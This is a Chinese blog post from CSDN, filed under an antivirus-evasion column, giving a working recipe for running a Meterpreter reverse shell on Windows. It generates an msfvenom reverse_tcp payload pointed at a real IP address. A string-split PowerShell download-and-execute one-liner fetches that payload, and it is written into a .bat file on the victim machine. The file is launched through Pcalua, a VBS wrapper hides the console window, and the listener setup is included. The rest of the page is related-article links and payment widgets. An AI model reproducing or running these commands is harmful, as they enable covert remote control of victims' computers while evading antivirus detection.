Pcalua+Powershell混淆

最新推荐文章于 2024-09-27 11:16:51 发布
最新推荐文章于 2024-09-27 11:16:51 发布
阅读量302 收藏
点赞数
分类专栏: 免杀 文章标签: cmd powershell windows 安全 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/reaido/article/details/113397328
版权

一、Pcalua加载shellcode

1、msfvenom生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1

2、混淆处理

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"

3、被攻击机写入bat

type nul > 1.bat
echo powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.ps1'')) ';IEX ($a+$b)"> 1.bat

4、msf设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 39.104.56.140
set LPORT 7100
exploit

5、cmd Pcalua运行1.bat

Pcalua -m -a 1.bat

二、powershell混淆

1、

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://x.X.X.X:7200/a.ps1''))';IEX ($a+$b)"

2、通过vbs执行bat不会弹出cmd
3、vbs文件

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c start.bat",vbhide

4、结束

驾马飞雾
关注
专栏目录
powershell代码混淆绕过
weixin_41082546的博客
06-21 1511
目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。powershell的功能强大且调用方式十分灵活。 1. cmd启动powershell 首先看看powershel使用cmd.exe启动执行代码的方式: 1.1 常规方法 cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green" cmd.exe /c "echo Write-Host SUCCESS -Fore G.
PowerShell混淆相关
JiangBuLiu的博客
06-18 311
????????????相关技术文章2016.05.26-[利用机器学习检测恶意PowerShell](https://bbs.pediy.com/thread-230002.htm)2018.11.09-[FireEye - 基于机器学习的模糊命令行检测](https://www.fireeye.com/blog/threat-research/2018/11/obfuscated-command-line-detection-using-machine-learning.html)2018.11.28-
阿里云PowerShell混淆工具(Aliyun-PSDeObfuscator)
gitblog_00307的博客
08-07 315
阿里云PowerShell混淆工具(Aliyun-PSDeObfuscator) aliyun-psdeobfuscator项目地址:https://gitcode.com/gh_mirrors/al/aliyun-psdeobfuscator 一、项目介绍 阿里云PowerShell混淆工具(Aliyun-PSDeObfuscator)是一款专门用于解析和还原被混淆PowerShell脚...
iOS使用shell脚本注入混淆内容
weixin_34320724的博客
02-14 171
2019独角兽企业重金招聘Python工程师标准>>> ...
powershell 中的字符串混淆
lacoucou的专栏
06-23 405
例子1 (VarIaBLE '*MDr*').naMe[3,11,2]-JoiN'' 执行结果是 iex 解析: PS > VarIaBLE '*MDr*' #执行命令 variable '*MDr' Name Value
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 808
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
java+powershell 控制windows
04-13
Java 和 PowerShell 是两种在 Windows 操作系统中常用于管理和控制系统的工具。Java 是一种跨平台的编程语言,而 PowerShell 是微软开发的一种命令行脚本环境,尤其适合管理系统资源。在这个场景下,我们可以利用 ...
SMO+PowerShell 实现SQLServer数据库的备份与还原
03-23
标题 "SMO+PowerShell 实现SQLServer数据库的备份与还原" 涉及到的是在SQL Server环境中,使用SQL Server Management Objects (SMO) 和 PowerShell脚本来自动化数据库的备份和恢复过程。这是一种高效且灵活的方法,...
monaco-powershell:VSCode的Monaco编辑器+ PowerShell编辑器服务!
04-27
Monaco-PowerShell是将微软开发的Monaco编辑器与PowerShell编辑器服务结合的项目,主要用于在Web环境中提供强大的代码编辑体验,尤其适合于VSCode(Visual Studio Code)的扩展开发或者在线代码编辑场景。...
cmder+windowspowershell
06-08
Windows操作系统上,我们通常会使用DOS命令行(CMD)或者PowerShell进行各种操作,但这些内置的命令行界面在功能和用户体验上有所限制。这时,"cmder"作为一个强大的增强型终端工具,便应运而生。它与Windows ...
shell混淆
qq_52861623的博客
05-20 316
shell混淆处 1、用命令的执行结果为变量赋值的两种方法command 或 (command),哪个更好?答:第一种方式把命令用反引号‘‘(位于Esc键的下方)包围起来,反引号和单引号非常相似,容易产生混淆。第一种方法赋值是先赋值(整个shell命令都当作字符来赋值),再执行命令第二种方式把命令用(command ),哪个更好? 答:第一种方式把命令用反引号` `(位于 Esc 键的下方)包围起来,反引号和单引号非常相似,容易产生混淆。第一种方法赋值是先赋值(整个shell命令都当作字符来赋值),再执行
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1303
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 891
免杀对抗-Powershell-混淆无文件
APT污水 - 使用多阶段高度混淆PowerShell在内存中运行
JiangBuLiu的博客
05-31 4757
通过恶意宏开启多阶段高隐藏攻击链拥有历史传承的社工手法????宏入口UserForm2.Gladiator_CRKUserForm1注册表PowerShell 拥有历史传承的社工手法???? 文档打开后会通过模糊图片和文字欺骗受害者启用宏。宏代码运行后会弹出虚假的提示,表示“由于版本不兼容所以无法查看文档。”等: 污水这个显示效果和文字内容已经使用很久了: 宏 入口 从宏代码的入口就可以发现这个攻击链有一些特殊,并不是所有代码都放在默认的位置一次性执行。先从入口的“Document_Open()”函数执
Revoke-Obfuscation:一款功能强大的PowerShell混淆检测框架
ZL_1618的博客
08-24 138
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
脚本命令类恶意代码——PowerShell混淆脚本分析方法
最新发布
信息安全
09-27 1176
由于PowerShell具有强大的系统管理和自动化能力,它可以被用于执行恶意代码、进行横向移动、执行无文件攻击等恶意行为。其中,Office宏病毒是一种常见的恶意软件形式,它利用Office文档中的宏代码来调用PowerShell并执行恶意行为。这种攻击方式通常会利用社会工程学手段来诱使用户启用宏代码,从而触发PowerShell的执行。此外,还有一种被称为"无文件攻击"的攻击技术,通过利用PowerShell的内存执行功能,无需在受感染系统上写入可执行文件,从而执行恶意行为而不留下明显的痕迹。
Shell && C 易混淆语法
llanlianggui的博客
03-13 253
#记录工作中Shell语法与linux易混淆的语法 Linux Shell: 1. 变量++ a=$(($a+1)) 2. switch语句 case a in 1) echo "a=1"; ;; 2) echo "a=2" ;; *) echo "a=$a" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值